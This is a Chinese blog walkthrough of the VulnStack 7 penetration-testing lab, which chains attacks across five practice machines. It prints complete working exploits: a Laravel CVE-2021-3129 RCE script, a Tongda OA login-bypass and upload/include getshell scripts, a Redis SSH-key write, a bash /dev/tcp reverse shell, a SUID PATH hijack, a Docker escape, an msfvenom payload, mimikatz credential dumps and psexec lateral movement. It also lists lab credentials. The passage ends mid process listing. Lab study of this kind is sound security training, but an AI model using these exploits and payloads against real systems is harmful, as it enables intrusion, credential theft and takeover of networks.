VulnStack 7

2024-12-05
作者 Err0r2333
~40.78K 字
次阅读

不想复习啊，打个vulnstack7放松一下就当我今天学习了吧

环境配置

整个靶场环境一共五个靶机（总共27.8 GB），分别位于三层网络环境中(来自官方文档)：

虚拟机搭搭，在Vmware中新增两个虚拟网卡VMnet8、VMnet14。VMnet8设为默认的NAT模式，IP段设为 192.168.52.0/24；VMnet14设为仅主机模式，IP段设为192.168.93.0/24，如下图所示

实测由于NAT模式和52网段是一致的，因此我修改了一下，访问192.168.54.128就是web1的公网了

配网卡如下：

为Web 1配置两张网卡，一张桥接模式（或者nat主机），另一张连VMnet8
为Web 2和PC1配置两张网卡，一张VMnet8、另一张VMnet14
为DC和PC 2配置一张网卡，为VMnet14

由于所有靶机都是没有启动服务的，我们需要手动配置一下：

域用户信息

域用户账户和密码如下：

Administrator：Whoami2021
whoami：Whoami2021
bunny：Bunny2021
moretz：Moretz2021
Ubuntu 1：
- web：web2021
Ubuntu 2：
ubuntu：ubuntu
通达OA账户：
- admin：admin657260

手动登录各台机子后打开服务：

Web 1：

1
2
3

redis-server /etc/redis.conf
/usr/sbin/nginx -c /etc/nginx/nginx.conf
iptables -F

Web 2:

1 2	sudo service docker start sudo docker start 8e172820ac78

PC 1:

启动通达OA：

1
2
3

C:\MYOA\bin\AutoConfig.exe

注意此处需要关闭防火墙+管理员权限运行

配置完毕后开打。

开打

fscan扫192.168.54.128：

.\fscan.exe -h 192.168.54.128

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
[*] start port scan
 192.168.54.128: [22 80 81 6379]
[*] alive ports len is :4
---------------------------------------------
[*] start vulscan
[*] WebTitle http://192.168.54.128:81  code:200 len:17474  title:Laravel
[+] InfoScan http://192.168.54.128:81  [Laravel] 
[*] WebTitle http://192.168.54.128     code:502 len:584    title:502 Bad Gateway
[+] Redis 192.168.54.128:6379 unauthorized file:/home/web/dump.rdb
[+] Redis 192.168.54.128:6379 like can write /var/spool/cron/
[+] PocScan http://192.168.54.128:81 poc-yaml-laravel-cve-2021-3129

可以看见开的81、6379都是有漏洞的。

想起laravel的cve可以去看一下今年鹏城杯线上赛的一个ez_laravel，被折磨的不清，不过这里是cve，我到时候再直接找python脚本跑，这里先利用redis未授权访问

流程：

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\n 你的公钥"
save

但是permission denied：

原因是忘记sudo起root权限的redis了，修改后重新写入：

随后ssh root@192.168.54.128免密登录成功

拿到root权限后通过ifconfig发现52网段，传fscan对52网段进行扫描：

root@ubuntu:~# ./fscan -h 192.168.52.1-255

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.3
start infoscan
(icmp) Target 192.168.52.10   is alive
(icmp) Target 192.168.52.20   is alive
[*] Icmp alive hosts len is: 2
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.10:81 open
192.168.52.10:80 open
192.168.52.10:6379 open
192.168.52.20:8000 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://192.168.52.20:8000 code:200 len:17474  title:Laravel
[*] WebTitle http://192.168.52.10:81   code:200 len:17474  title:Laravel
[+] InfoScan http://192.168.52.20:8000 [Laravel] 
[+] InfoScan http://192.168.52.10:81   [Laravel]                             
[*] WebTitle http://192.168.52.10      code:502 len:584    title:502 Bad Gateway
[+] Redis 192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
[+] Redis 192.168.52.10:6379 like can write /root/.ssh/                      
[+] Redis 192.168.52.10:6379 like can write /var/spool/cron/                 
[+] PocScan http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129           
[+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129

发现192.168.52.20(10是本机)

20段发现还是laravel服务？

查看nginx服务

1	cd /etc/nginx/conf.d

可以看到确实有81端口的反代，因此我们实际访问81的端口是192.168.52.20的8000端口，于是直接打即可。

但是我们先frp打通52网段，走192.168.54.129的6002端口起socks5即可：

走socks5代理成功访问到52网段

搜cve-2021-3129的payload：

https://github.com/crisprss/Laravel_CVE-2021-3129_EXP/tree/main

# -*- coding=utf-8 -*-
# Author : Crispr
import os
import requests
import sys

class EXP:
    #这里还可以增加phpggc的使用链，经过测试发现RCE5可以使用
    __gadget_chains = {
        "monolog_rce5":r"""
         php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "%s" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex (ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
        """
    }

    def __vul_check(self):
        res = requests.get(self.__url,verify=False)
        if res.status_code != 405 and "laravel" not in res.text:
            print("[+]Vulnerability does not exist")
            return False
        return True

    def __payload_send(self,payload):
        header = {
            "Accept": "application/json"
        }
        data = {
            "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
            "parameters": {
                "variableName": "cve20213129",
                "viewFile": ""
            }
        }
        data["parameters"]["viewFile"] = payload
        res = requests.post(self.__url, headers=header, json=data, verify=False)
        return res

    def __clear_log(self):
        payload = "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
        return self.__payload_send(payload=payload)

    def __generate_payload(self,gadget_chain):
        generate_exp = self.__gadget_chains[gadget_chain] % self.__command
        #print(generate_exp)
        exp = "".join(os.popen(generate_exp).readlines()).replace("\n","")+ 'a'
        print("[+]exploit:")
        print(exp)
        return exp

    def __decode_log(self):
        return self.__payload_send(
            "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")

    def __unserialize_log(self):
        return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")

    def __rce(self):
        text = str(self.__unserialize_log().text)
        #print(text)
        text = text[text.index(']'):].replace("}","").replace("]","")
        return text

    def exp(self):
        for gadget_chain in self.__gadget_chains.keys():
            print("[*] Try to use %s for exploitation." % (gadget_chain))
            self.__clear_log()
            self.__clear_log()
            self.__payload_send('A' * 2)
            self.__payload_send(self.__generate_payload((gadget_chain)))
            self.__decode_log()
            print("[*] Result:")
            print(self.__rce())

    def __init__(self, target, command):
        self.target = target
        self.__url = requests.compat.urljoin(target, "_ignition/execute-solution")
        self.__command = command
        if not self.__vul_check():
            print("[-] [%s] is seems not vulnerable." % (self.target))
            print("[*] You can also call obj.exp() to force an attack.")
        else:
            self.exp()

def main():
    EXP("http://127.0.0.1:8000",sys.argv[1])

if __name__ == "__main__":
    main()

都拿下了，如果可以也可以配置proxychains4来打20机，但是会很慢。但是它做了一层反代出去之后我们就可以通过81端口拿下20机laravel服务

我们再写个shell进去：

蚁剑连接

成功拿下，继续查看信息(此时我们其实是对内网的52.20机子进行操作)，发现无法进行ipconfig操作。

ls -al /发现了.dockerenv文件，说明我们是在一个docker环境里。尝试docker逃逸，但前提是docker逃逸需要root权限，我们得找办法提权：

发现有/home/jobs/shell文件在，查看还能够得到demo.c：

(www-data:/home/jobs) $ cat demo.c
#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");
}

这里可以看到是一个执行ps的操作，但是执行的时候是root权限执行的。

利用就参照一下自己的博客：https://err0r233.github.io/posts/13343.html

echo "/bin/bash" > /tmp/ls
chmod 777 /tmp/ls
export PATH=/tmp:$PATH

#然后执行这个test可执行文件

这里的例子是ls，所以我们改成ps即可：

echo "/bin/bash" > /tmp/ps
chmod 777 /tmp/ps
export PATH=/tmp:$PATH

#然后执行这个test可执行文件

注意我们现在的环境变量是php的环境变量，想修改环境变量得反弹一个shell过来：

1
2
3

bash -c 'exec bash -i >& /dev/tcp/192.168.52.10/1337 0>&1'

# 这里也是学到了用蚁剑的终端怎么反弹shell了

为什么要用52.10这台ubuntu机子呢，因为他其实是52.20，它只通web1

由此可以从web1拿下。然后执行shell：

环境没有python3，就将就一下用这个shell吧。

接下来看是否为特权模式：

cat /proc/1/status | grep Cap

cat /proc/1/status | grep Cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

当执行 cat /proc/1/status | grep Cap 查询对应出来的值为 0000003fffffffff 那么就有可能是特权容器，可尝试逃逸

fdisk -l

还是我们的sda1

Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
Disk model: VMware Virtual S
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00063af9

Device     Boot    Start      End  Sectors Size Id Type
/dev/sda1  *        2048 16779263 16777216   8G 83 Linux
/dev/sda2       16781310 20969471  4188162   2G  5 Extended
/dev/sda5       16781312 20969471  4188160   2G 82 Linux swap / Solaris

接下来就是重复vulnstack4的操作，检查发现存在ubuntu用户

然后将我们的key写进去

1
2
3

cp -avx test/home/ubuntu/.ssh/id_rsa.pub test/home/ubuntu/.ssh/authorized_keys # -avx是将权限也一起复制
echo > test/home/ubuntu/.ssh/authorized_keys # 清空authorized_keys文件
echo '生成的.pub文件的内容' > test/home/ubuntu/.ssh/authorized_keys # 将ssh秘钥写入authorized_keys文件

然后我们走proxychains4登入52.20：

不出意外的肯定是要出意外了，一直登录不进这个机子。那就只能够去爆破/etc/shadow了：

1	ubuntu:$1$xJbww$Yknw8dsfh25t02/g2fM9g/:18281:0:99999:7:::

其实这个key已经爆破过了，就是ubuntu。

我们直接通过ubuntu/ubuntu连接即可，登录后sudo -i即可拿下root权限：

接着看：

1	inet addr:192.168.93.10

由于这里我忘记关掉防火墙了，导致30网段的通达OA无法被连上，因此这里重新操作一下，重新fscan的结果：

通达oa啊，直接尝试通达oa的洞：

'''
@Author         : Sp4ce
@Date           : 2020-03-17 23:42:16
@LastEditors    : Sp4ce
@LastEditTime   : 2020-04-22 16:24:52
@Description    : Challenge Everything.
'''
import requests
from random import choice
import argparse
import json

USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]

headers={}
proxies = {
    'http' : f'socks5://192.168.54.129:6002',
    'https' : f'socks5://192.168.54.129:6002'
}

def getV11Session(url):
    checkUrl = url+'/general/login_code.php'
    try:
        headers["User-Agent"] = choice(USER_AGENTS)
        res = requests.get(checkUrl,headers=headers, proxies=proxies)
        resText = str(res.text).split('{')
        codeUid = resText[-1].replace('}"}', '').replace('\r\n', '')
        print(codeUid)
        getSessUrl = url+'/logincheck_code.php'
        res = requests.post(
            getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers, proxies=proxies)
        print(res.text)
        print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
    except:
        print('[-]Something Wrong With '+url)



def get2017Session(url):
    checkUrl = url+'/ispirit/login_code.php'
    try:
        headers["User-Agent"] = choice(USER_AGENTS)
        res = requests.get(checkUrl,headers=headers, proxies=proxies)
        resText = json.loads(res.text)
        codeUid = resText['codeuid']
        codeScanUrl = url+'/general/login_code_scan.php'
        res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
            1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers, proxies=proxies)
        resText = json.loads(res.text)
        status = resText['status']
        if status == str(1):
            getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid
            res = requests.get(getCodeUidUrl, proxies=proxies)
            print('[+]Get Available COOKIE:'+res.headers['Set-Cookie'])
        else:
            print('[-]Something Wrong With '+url  + ' Maybe Not Vulnerable ?')
    except:
        print('[-]Something Wrong With '+url)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-v",
        "--tdoaversion",
        type=int,
        choices=[11, 2017],
        help="Target TongDa OA Version. e.g: -v 11、-v 2017")
    parser.add_argument(
        "-url",
        "--targeturl",
        type=str,
        help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1"
    )
    args = parser.parse_args()
    url = args.targeturl
    if 'http://' not in url:
        url = 'http://' + url
    if args.tdoaversion == 11:
        getV11Session(url)
    elif args.tdoaversion == 2017:
        get2017Session(url)
    else:
        parser.print_help()

最常见的就是通达oa前台任意登录。这里直接试一下上面的exp就行了，注意这里配置了socks5代理

https://www.freebuf.com/vuls/257154.html

后面getshell的流程试这个：

import requests

proxies = {
    'http' : f'socks5://192.168.54.129:6002',
    'https' : f'socks5://192.168.54.129:6002'
}
burp0_data = {
    "UPLOAD_MODE": "2",
    "P" : "123",
    "DEST_UID":"1"
}
burp0_url = "http://192.168.52.30:8080/ispirit/im/upload.php"
cookies = {
    "PHPSESSID":"j0rn2m18dmneombpnu3t6klks2",
    "path":"/"
}
html = requests.post(burp0_url, cookies=cookies, data=burp0_data, files= {"ATTACHMENT":("jpg", open("D:\\lost and found\\CTF\\pcb线下\\Hacking8cms\\01-通达OA\\tdoa_getshell\\attachment.jpg", "rb"), "image/jpeg")}, proxies=proxies)
print(html.request.body)
print(html.text)

自己写的一个python脚本：

1	+OK [vm]258@2412_62225625\|jpg\|0[/vm]

shell的路径是：

1	2412/62225625.jpg

文件包含：

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 49.233.3.2:8888
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 69
Content-Type: application/x-www-form-urlencoded

json={"url":"/general/../../attach/im/2007/422124454.jpg"}&cmd=whoami

拿下。接下来尝试弹shell到msf上。这里由于我们写的shell是一个phpshell，我们最好就是直接使用cmd命令行的shell。

这个姿势是我学弟教我的，很强。

1	msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 LHOST=192.168.54.129 -f psh-cmd

psh-cmd可以生成powshell的命令行，直接在shell里执行即可：

记得使用msf之前先配代理（

先收集一波信息：

1 2	load kiwi creds_all

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain       LM              NTLM            SHA1
--------       ------       --              ----            ----
Administrator  WHOAMIANONY  56b0cd8b125c05  ab89b1295e69d3  2bc4124300a6a8f
                            055e2dd9e955f1  53dd7614c7a3a8  c0ca10891823d36
                            8034            0cec            c64e4b3a40
PC1$           WHOAMIANONY                  3e6a3d8c713b48  d8e1318a24c64b8
                                            21eaa51aab25f5  fcc89dc8609b09a
                                            2074            f50342bacf
bunny          WHOAMIANONY  7de10bf327ef7f  cc567d5556030b  3747632756191e3
                            2ac6ebe8776a15  7356ee4915ff09  350e53211c63f80
                            3feb            8c8f            4eb163638f

wdigest credentials
===================

Username       Domain       Password
--------       ------       --------
(null)         (null)       (null)
Administrator  WHOAMIANONY  Whoami2021
PC1$           WHOAMIANONY  %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9M
                            Twmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrk
                            o+zfn@])/"$V6?sDZel=f>[ol;
bunny          WHOAMIANONY  Bunny2021

tspkg credentials
=================

Username       Domain       Password
--------       ------       --------
Administrator  WHOAMIANONY  Whoami2021
bunny          WHOAMIANONY  Bunny2021

kerberos credentials
====================

Username       Domain           Password
--------       ------           --------
(null)         (null)           (null)
Administrator  WHOAMIANONY.ORG  Whoami2021
bunny          WHOAMIANONY.ORG  Bunny2021
pc1$           whoamianony.org  %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yv
                                w.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5
                                A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
pc1$           WHOAMIANONY.ORG  %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yv
                                w.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5
                                A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;

hashdump：

1 2	Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

ipconfig：

Ethernet adapter �������� 4:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::ec90:4e8e:f29f:ef78%23
   IPv4 Address. . . . . . . . . . . : 192.168.93.20
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

查看域管：

1	net group "domain admins" /domain

发现access denied。

其实这里我们已经抓到了域管的账号密码了：Administrator/Whoami2021

先创个msf路由：

1	route add 192.168.93.0 255.255.255.0 3

这里得用meterpreter的进程来添加

udp_probe

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0/24
set threads 20
run

发现93.1、93.20、93.30，其中93.20是自己

尝试psexec：

use exploit/windows/smb/psexec
set smbuser Administrator
set smbpass Whoami2021
set smbdomain whoamianony
set rhosts 192.168.93.1 192.168.93.30
run

这里很怪，93.1是没有445端口的。重启之后又变正常了，ip变回了40。30的psexec打不上去，但是40的可以：

怀疑是防火墙的问题，此处我们要通过PC1 或者 PC2把域控的防火墙给关了，此时我们要从system改为administrator权限，pc2没有可用的进程迁移。

查看pc1的：

Process List
============

 PID   PPID  Name        Arch  Session  User              Path
 ---   ----  ----        ----  -------  ----              ----
 0     0     [System Pr
             ocess]
 4     0     System      x64   0
 252   4     smss.exe    x64   0        NT AUTHORITY\SYS  \SystemRoot\Syste
                                        TEM               m32\smss.exe
 332   492   svchost.ex  x64   0        NT AUTHORITY\LOC  C:\Windows\system
             e                          AL SERVICE        32\svchost.exe
 336   328   csrss.exe   x64   0        NT AUTHORITY\SYS  C:\Windows\system
                                        TEM               32\csrss.exe
 380   492   OfficeWeb.  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             exe                        TEM               eWeb.exe
 388   328   wininit.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\wininit.exe
 396   380   csrss.exe   x64   1        NT AUTHORITY\SYS  C:\Windows\system
                                        TEM               32\csrss.exe
 432   380   winlogon.e  x64   1        NT AUTHORITY\SYS  C:\Windows\system
             xe                         TEM               32\winlogon.exe
 492   388   services.e  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             xe                         TEM               32\services.exe
 504   388   lsass.exe   x64   0        NT AUTHORITY\SYS  C:\Windows\system
                                        TEM               32\lsass.exe
 512   388   lsm.exe     x64   0        NT AUTHORITY\SYS  C:\Windows\system
                                        TEM               32\lsm.exe
 612   492   svchost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\svchost.exe
 672   492   vmacthlp.e  x64   0        NT AUTHORITY\SYS  C:\Program Files\
             xe                         TEM               VMware\VMware Too
                                                          ls\vmacthlp.exe
 700   1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 720   492   svchost.ex  x64   0        NT AUTHORITY\NET  C:\Windows\system
             e                          WORK SERVICE      32\svchost.exe
 732   700   cmd.exe     x86   0        NT AUTHORITY\SYS  C:\Windows\SysWOW
                                        TEM               64\cmd.exe
 784   492   svchost.ex  x64   0        NT AUTHORITY\LOC  C:\Windows\System
             e                          AL SERVICE        32\svchost.exe
 840   2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 848   492   svchost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\System
             e                          TEM               32\svchost.exe
 876   492   svchost.ex  x64   0        NT AUTHORITY\NET  C:\Windows\system
             e                          WORK SERVICE      32\svchost.exe
 884   492   svchost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\svchost.exe
 900   1116  OfficeNgin  x86   0        NT AUTHORITY\SYS  C:\MYOA\nginx\Off
             x.exe                      TEM               iceNginx.exe
 908   2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 916   336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 1020  2544  iexplore.e  x86   1        WHOAMIANONY\Admi  C:\Program Files
             xe                         nistrator         (x86)\Internet Ex
                                                          plorer\iexplore.e
                                                          xe
 1036  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 1116  380   OfficeNgin  x86   0        NT AUTHORITY\SYS  C:\MYOA\nginx\Off
             x.exe                      TEM               iceNginx.exe
 1160  492   spoolsv.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\System
             e                          TEM               32\spoolsv.exe
 1200  492   svchost.ex  x64   0        NT AUTHORITY\LOC  C:\Windows\system
             e                          AL SERVICE        32\svchost.exe
 1288  492   VGAuthServ  x64   0        NT AUTHORITY\SYS  C:\Program Files\
             ice.exe                    TEM               VMware\VMware Too
                                                          ls\VMware VGAuth\
                                                          VGAuthService.exe
 1348  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1364  2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1440  492   OfficeRedi  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             s.exe                      TEM               eRedis.exe
 1488  2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1492  4504  powershell  x86   0        NT AUTHORITY\SYS  C:\Windows\SysWOW
             .exe                       TEM               64\WindowsPowerSh
                                                          ell\v1.0\powershe
                                                          ll.exe
 1532  396   conhost.ex  x64   1        WHOAMIANONY\bunn  C:\Windows\system
             e                          y                 32\conhost.exe
 1540  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 1552  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1560  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1568  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1576  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1608  2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1728  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1736  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1744  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1752  1992  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1780  1560  cmd.exe     x86   0        NT AUTHORITY\SYS  C:\Windows\SysWOW
                                        TEM               64\cmd.exe
 1808  492   OfficeDbPr  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             oxy.exe                    TEM               eDbProxy.exe
 1824  336   conhost.ex  x64   0        NT AUTHORITY\SYS  C:\Windows\system
             e                          TEM               32\conhost.exe
 1828  2004  php-cgi.ex  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\php-c
             e                          TEM               gi.exe
 1992  380   OfficeFPM.  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             exe                        TEM               eFPM.exe
 2004  380   OfficeFPM.  x86   0        NT AUTHORITY\SYS  C:\MYOA\bin\Offic
             exe                        TEM               eFPM.exe
